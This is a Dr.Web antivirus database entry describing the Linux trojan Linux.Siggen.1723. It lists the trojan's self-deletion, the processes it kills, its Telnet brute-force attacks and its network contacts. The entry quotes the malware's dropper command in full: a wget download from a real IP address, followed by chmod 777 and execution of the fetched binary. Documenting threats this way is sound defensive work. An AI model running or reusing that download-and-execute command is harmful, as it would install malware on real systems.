Linux.Siggen.1723
Added to the Dr.Web virus database:
2019-05-19
Virus description added:
2019-05-18
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
Launches processes:
- /bin/sh -c wget http://185.244.25.160/hahdshd73ahshds73/ugei7; chmod 777 *; ./ugei7 wget.arm7
- wget http://185.244.25.160/hahdshd73ahshds73/ugei7
- chmod 777 run.sh stdout.log ugei7
- ./ugei7 wget.arm7
Kills the following processes:
- exim4
- bash
- run.sh
- /root/ugei7
Performs operations with the file system:
Modifies file access rights:
Creates or modifies files:
Deletes files:
Network activity:
Awaits incoming connections on ports:
Establishes connection:
- 8.#.8.8:53
- 18#.##4.25.160:6574
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
- 18#.###.##.160/hahdshd73ahshds73/ugei7
Sends data to the following servers:
- 18#.##4.25.160:6574
- 74.#.177.118:23
- 99.##.225.223:23
- 21#.#.111.63:23
- 42.##.144.180:23
- 19#.##.148.228:23
- 19#.##4.125.74:23
- 13#.##.139.121:23
- 17#.##.251.40:23
- 18.###.219.71:23
- 16#.#4.35.14:23
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細